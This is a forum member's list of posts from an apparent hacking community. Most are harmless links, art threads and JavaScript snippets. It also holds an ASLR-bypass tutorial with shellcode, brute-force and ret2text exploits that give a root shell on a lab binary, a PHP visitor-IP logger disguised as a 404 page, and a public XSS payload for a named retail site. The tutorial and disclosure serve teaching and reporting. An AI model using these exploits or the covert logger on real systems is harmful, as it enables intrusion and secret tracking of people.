Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - connection

Pages: 1 ... 3 4 [5] 6 7 ... 9
61
Tutorials/Guides / Intro To Defeating ASLR
« on: November 09, 2011, 04:19:33 pm »
This tutorial is an ASLR intro for those wanting to get exploiting on a modern *nix system. It is not an in depth reference as there are many many ways to bypass ASLR on a *nix system and many papers out there regarding many unique methods. The problem is many of these methods are not practical as they will only work in certain situations that are rare in the wild. My aim for this tutorial is introduce people to ASLR and to arm you with the simplest and most practical ASLR bypassing techniques.

For this tutorial I will show two straight forward and useful methods that will get you going quickly: bruteforce an ret2text.

I will be using fully updated Debian squeeze (6.0.3) with 2.6.32-5-686 kernel. It is assumed that you know how to exploit a simple local buffer overflow on linux.

What is ASLR?

ASLR stands for address space layout randomization. Basically when this is implemented, many of the usual areas you would be able to return to when exploiting are randomized. Therefore, you can't expect to hardcode an address in your exploit. You can temperarily enable or disable ASLR as follows:

Value that is non-zero is true, thus its enabled:
Code: [Select]
jason@tutorial:~$ cat /proc/sys/kernel/randomize_va_space
2

Disable ASLR:
Code: [Select]
root@tutorial:~# echo 0 > /proc/sys/kernel/randomize_va_space

Only root has the permissions to edit this, however, its useful to know incase you want to practice exploiting without the bother of ASLR.

The most obvious and well used area ASLR affects is the stack. In a traditional buffer overflow, you would return into your shellcode which would be located on the stack (or environment variable etc. which are also stored on the stack). There are some areas that are not randomized and can be returned to in order to execute our payload. We will first go over exploiting using the stack and bruteforcing the location.

Our vulnerable program: bof.c
Code: [Select]
#include <stdio.h>
#include <string.h>

void rootshit(void){
    system("/bin/sh");
}

int main(int argc, char **argv){
char buf[256];
strcpy(buf,argv[1]);
printf("%s\n", buf);

return 0;
}


Exploiting it without ASLR
Before I get into ASLR, I thought I would demonstrate quickly the exploitation without ASLR:

Code: [Select]
jason@tutorial:~$ gcc -o bof bof.c
root@tutorial:~#  echo 0 > /proc/sys/kernel/randomize_va_space
root@tutorial:~#  chown root:root bof
root@tutorial:~# chmod u+s bof
jason@tutorial:~$ ulimit -c unlimited
jason@tutorial:~$ ./bof `perl -e 'print"A"x272'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Segmentation fault (core dumped)
jason@tutorial:~$ gdb -q -c core
Core was generated by `./bof AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb)
 p 272-25
-4
$1 = 243
(gdb) q
jaso@tutorial:~$ ./bof `perl -e 'print"\x90"x243 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" . "DDDD"'`

���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�Ph//shh/bin��PS��1Ұ

                                                                                                DDDD
Segmentation fault (core dumped)
jason@tutorial:~$ gdb -q -c core
Core was generated by `./bof �������������������������������������������������������������������������'.
Program terminated with signal 11, Segmentation fault.
#0  0x44444444 in ?? ()
(gdb) x/s 0xbffff65b
   // I cut finding address of the buffer for length sake
0xbffff65b:     "\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\061\300Ph//shh/bin\211\343PS\211\341\061Ұ\v̀DDDD"                   
(gdb) q
jason@tutorial:~$ ./bof `perl -e 'print"\x90"x243 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" . "\x5b\xf6\xff\xbf"'`

���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�Ph//shh/bin��PS��1Ұ

                                                                                                [���
# whoami
root
#


So the demo above is simply exploiting the buffer overflow with ASLR disabled. I showed this to make it easier to understand the following sections.

Bruteforce
I like to think this method is the most common, although it does have some downsides. For example, if this were a network program and we were exploiting it remotely, it may not restart after a crash so bruteforcing may fail. Also, on a 64bit system the addresses are larger so it will take a lot more time.. Bypassing ASLR using bruteforce can be done simply by using bash:

Code: [Select]
jason@tutorial:~$ while true; do ./bof `perl -e 'print"\x90"x243 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" . "\x5b\xf6\xff\xbf"'`; done

Segmentation fault
// garbage cut
Segmentation fault
// garbage cut
Segmentation fault
// garbage cut
# whoami
root
#

As you can see, after about 10 seconds on my 32bit PC the shell is dropped. Also note that my nopsled size is faily good. This is important because if you have a larger nopsled, you have a better chance of landing in it. And thats essentially it for bruteforce :)

Tip: use environment variables over the stack when storing shellcode if possible. This allows you more room in your nopsled.

Ret2Text
This is an easy method but does have some requirements that may be difficult to satisfy in the wild. This technique works by returning into the .text section. The .text section is where the programs instructions are stored. If your program has a function that does something that an unprivledged user cannot do, such as authentication etc, this will allow you to execute anything within the program. I made an obvious example to give you an idea of what I mean. This program has a function called rootshit() which executes /bin/sh shell. The function is never called in the program, so we have no way of executing it, right? Wrong:

Code: [Select]
jason@tutorial:~$ gdb -q ./bof
Reading symbols from /home/jason/Desktop/tutorial/bof...(no debugging symbols found)...done.
(gdb) p rootshit
$1 = {<text variable, no debug info>} 0x8048434 <rootshit>
(gdb) p 272-4
$2 = 268
(gdb) q
jason@tutorial:~$ ./bof `perl -e 'print"\x90"x268 . "\x34\x84\x04\x08"'`
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������4�#
# whoami
root
#

And it's as simple as that. As I mentioned before, there are tons of ways to defeating ASLR. These two I find as the easiest and most practical (although ret2text is kinda iffy). If you have any questions or criticism, let me know.

-jason

Taken from our affiliates over at http://jasonwhelan.net

62
General Discussion / Step 4: Prophet
« on: November 09, 2011, 03:46:01 pm »
Lol, made this image and put it on reddit.

http://www.reddit.com/r/funny/comments/m6io7/step_4_prophet/

63
PHP/Javascript / IP Grabber
« on: November 09, 2011, 03:20:57 pm »
I was recently asked how to create something that when visited would log the visitor's IP; this is some really fast code I hacked together as a PoC for that discussion.

Code: [Select]
<?php
$ip 
$_SERVER['REMOTE_ADDR']; //$_SERVER['REMOTE_ADDR']; grabs visitor's IP
$date_time date("l j F Y  g:ia"time() - date("Z")); // here we get the current date/time
$f fopen('ips.txt','a'); // open up ips.txt in append mode
fwrite($f"===========\n" $date_time $ip "===========\n"); //dump the date and ip into ips.txt
fclose($f); //close ips.txt
echo('
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html>'
); //fake 404 page for stealth
?>


64
General Discussion / [ART] Connection's Abstract Art Thread
« on: October 27, 2011, 04:45:11 pm »
Hey guys I've decided I'm gonna use this thread to dump all my abstract art as I learn the style. Enjoy.


65
General Discussion / PI FTW
« on: October 25, 2011, 09:28:53 am »
Haha just noticed this so I screenshotted it.


66
Hacking News / Owned and exp0sed Issue 3
« on: October 24, 2011, 12:02:45 pm »
Super fresh to the scene, here is Owned and exp0sed Issue #3 for all your viewing pleasures.

http://blog.yakuza112.org/wp-content/uploads/2011/10/exp03.txt

67
Feedback / [GFX] Banner Contest
« on: October 20, 2011, 10:07:13 am »
How would you guys like it if we had a Banner Contest? I'm sure I could come up with some prizes to give out to the winner and second place.

68
*nix Support / PuTTY + irssi + screen Flash in Taskbar
« on: October 07, 2011, 06:10:55 pm »
Had the hardest time getting this to work but I finally did and I figured I'd share since I know that Eph was having a similar issue.

http://james.greenhalgh.eu/2010/irc-setup-guide-irssi-screen-and-putty-tray/

69
General Discussion / This Image Made My Day
« on: October 07, 2011, 02:09:02 pm »
Figured I'd start this topic after seeing a picture that made my day.

Post a picture that made your day today and comment on the other pics people post.


70
General Discussion / Choosing Microsoft Over the NFL
« on: October 07, 2011, 09:48:02 am »
http://www.microsoft.com/Presspass/Features/2011/oct11/10-07Rocker.mspx?rss_fdn=Custom

So this guy essentially has to choose between getting hired at Microsoft of playing another year of college football for a potential chance at joining the NFL; both of these things being his dreams. If you had to pick between these two which would you go for?

71
PHP/Javascript / [PHP] Making a cool login system with PHP MySQL and jQuery
« on: September 17, 2011, 12:13:44 am »
Today we are making a cool & simple login / registration system. It will give you the ability to easily create a member-only area on your site and provide an easy registration process.

It is going to be PHP driven and store all the registrations into a MySQL database.

To add the needed flair, we are using the amazing sliding jQuery panel, developed by Web-kreation.

http://tutorialzine.com/2009/10/cool-login-system-php-jquery/

72
PHP/Javascript / [Javascript] 10 super useful Javascript Snippets
« on: September 17, 2011, 12:06:36 am »
1. Email Validation

Source
Code: [Select]
function checkMail(email){
var filter  = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
if (filter.test(email)) {
return true;
}
return false;
}
2. Toogle Checkboxes

Source

Code: [Select]
<script type="text/javascript">

function toggle_checkboxes(id) {
    if (!document.getElementById){ return; }
    if (!document.getElementsByTagName){ return; }
    var inputs = document.getElementById(id).getElementsByTagName("input");
    for(var x=0; x < inputs.length; x++) {
        if (inputs[x].type == 'checkbox'){
            inputs[x].checked = !inputs[x].checked;
        }
    }
}

</script>

<div id="parent_box">

    <input type="checkbox" name="foo" value="1" /> 1<br/>
    <input type="checkbox" name="foo" value="2" checked="checked" /> 2<br/>
    <input type="checkbox" name="foo" value="3" checked="checked" /> 3<br/>

    <br/>
    <input type="button" value="Toggle checkboxes"
        onclick="toggle_checkboxes('parent_box')" />

</div>

3. Image Preloader

Source

Code: [Select]
var images = new Array();

function preloadImages(){
    for (i=0; i < preloadImages.arguments.length; i++){
         images[i] = new Image();
        images[i].src = preloadImages.arguments[i];
    }
}

preloadImages("logo.jpg", "main_bg.jpg", "body_bg.jpg", "header_bg.jpg");

4. Javascript cookies

Source

Code: [Select]
/**
 * Sets a Cookie with the given name and value.
 *
 * name       Name of the cookie
 * value      Value of the cookie
 * [expires]  Expiration date of the cookie (default: end of current session)
 * [path]     Path where the cookie is valid (default: path of calling document)
 * [domain]   Domain where the cookie is valid
 *              (default: domain of calling document)
 * [secure]   Boolean value indicating if the cookie transmission requires a
 *              secure transmission
 */
function setCookie(name, value, expires, path, domain, secure) {
    document.cookie= name + "=" + escape(value) +
        ((expires) ? "; expires=" + expires.toGMTString() : "") +
        ((path) ? "; path=" + path : "") +
        ((domain) ? "; domain=" + domain : "") +
        ((secure) ? "; secure" : "");
}

/**
 * Gets the value of the specified cookie.
 *
 * name  Name of the desired cookie.
 *
 * Returns a string containing value of specified cookie,
 *   or null if cookie does not exist.
 */
function getCookie(name) {
    var dc = document.cookie;
    var prefix = name + "=";
    var begin = dc.indexOf("; " + prefix);
    if (begin == -1) {
        begin = dc.indexOf(prefix);
        if (begin != 0) return null;
    } else {
        begin += 2;
    }
    var end = document.cookie.indexOf(";", begin);
    if (end == -1) {
        end = dc.length;
    }
    return unescape(dc.substring(begin + prefix.length, end));
}

/**
 * Deletes the specified cookie.
 *
 * name      name of the cookie
 * [path]    path of the cookie (must be same as path used to create cookie)
 * [domain]  domain of the cookie (must be same as domain used to create cookie)
 */
function deleteCookie(name, path, domain) {
    if (getCookie(name)) {
        document.cookie = name + "=" +
            ((path) ? "; path=" + path : "") +
            ((domain) ? "; domain=" + domain : "") +
            "; expires=Thu, 01-Jan-70 00:00:01 GMT";
    }
}
5. Sort Dropdown Menu

Source

Code: [Select]
function sortList(id) {
var obj = document.getElementById("id");
var values = new Array();
for(var i = 0; i < obj.options.length; i++) {
values.push(obj.options[i].innerHTML + "--xx--" + obj.options[i].value);
}

values = values.sort();

for(var i = 0; i < values.length; i++) {
valueArray = values[i].split('--xx--');
obj.options[i].innerHTML = valueArray[0];
obj.options[i].value = valueArray[1];
}
}

6. Determine if Browser Understands HTML5 Video

Source

Code: [Select]
// Check if the browser understands the video element.
function understands_video() {
  return !!document.createElement('video').canPlayType; // boolean
}

if ( !understands_video() ) {
// Must be older browser or IE.
// Maybe do something like hide custom
// HTML5 controls. Or whatever...
videoControls.style.display = 'none';
}

7. Get browser viewport width and height

Source

Code: [Select]
<script type="text/javascript">
<!--

 var viewportwidth;
 var viewportheight;

 // the more standards compliant browsers (mozilla/netscape/opera/IE7) use window.innerWidth and window.innerHeight

 if (typeof window.innerWidth != 'undefined')
 {
      viewportwidth = window.innerWidth,
      viewportheight = window.innerHeight
 }

// IE6 in standards compliant mode (i.e. with a valid doctype as the first line in the document)

 else if (typeof document.documentElement != 'undefined'
     && typeof document.documentElement.clientWidth !=
     'undefined' && document.documentElement.clientWidth != 0)
 {
       viewportwidth = document.documentElement.clientWidth,
       viewportheight = document.documentElement.clientHeight
 }

 // older versions of IE

 else
 {
       viewportwidth = document.getElementsByTagName('body')[0].clientWidth,
       viewportheight = document.getElementsByTagName('body')[0].clientHeight
 }
document.write('<p>Your viewport width is '+viewportwidth+'x'+viewportheight+'</p>');
//-->
</script>

8. getElementsByClassName

Source

Code: [Select]
/*
    Written by Jonathan Snook, http://www.snook.ca/jonathan
    Add-ons by Robert Nyman, http://www.robertnyman.com
*/

function getElementsByClassName(oElm, strTagName, strClassName){
    var arrElements = (strTagName == "*" && document.all)? document.all : oElm.getElementsByTagName(strTagName);
    var arrReturnElements = new Array();
    strClassName = strClassName.replace(/\-/g, "\\-");
    var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
    var oElement;
    for(var i=0; i<arrElements.length; i++){
        oElement = arrElements[i];
        if(oRegExp.test(oElement.className)){
            arrReturnElements.push(oElement);
        }
    }
    return (arrReturnElements)
}

9. Delayed Redirect

Source

Code: [Select]
setTimeout( "window.location.href =
'http://walkerwines.com.au/'", 5*1000 );

10. iPhone Style Change on Orientation Change

Source

Code: [Select]
window.addEventListener('load', setOrientation, false);
window.addEventListener('orientationchange', setOrientation, false);

function setOrientation() {
 var orient = Math.abs(window.orientation) === 90 ? 'landscape' : 'portrait';
 var cl = document.body.className;
 cl = cl.replace(/portrait|landscape/, orient);
 document.body.className = cl;
}

73
General Discussion / Custom Gameboys
« on: September 14, 2011, 08:05:32 pm »
Hey guys I've started making custom gameboys and such as a hobby.

Here is my first one (not yet sealed since I somehow managed to forget to buy sealant).

Gameboy DMG-01 (Original, "Grey brick" Gameboy)








74
Other / PC Assembly Language Tutorial
« on: September 13, 2011, 05:50:05 pm »
Really good tutorial on coding in NASM for PC Assembly.

http://www.drpaulcarter.com/pcasm/

75
General Discussion / Bandai.com XSS
« on: September 13, 2011, 12:58:06 pm »
What do Power Rangers, Ben 10, Thundercats and Tamagotchi have in common? Bandai.com; well... and an XSS.

I reported the Bandi.com XSS about a month or so ago to Bandi but never got any reply. Yesterday I decided to test the vulnerability again only to find that it's still an issue. Here's the XSS announcement which they will hopefully eventually see and patch their site.

Proof:


PoC:
Visit http://bandai.com and then type '>"><script>alert(/HackTalk.net/.source);</script> into the search bar.

Enjoy

Pages: 1 ... 3 4 [5] 6 7 ... 9

SimplePortal 2.3.3 © 2008-2010, SimplePortal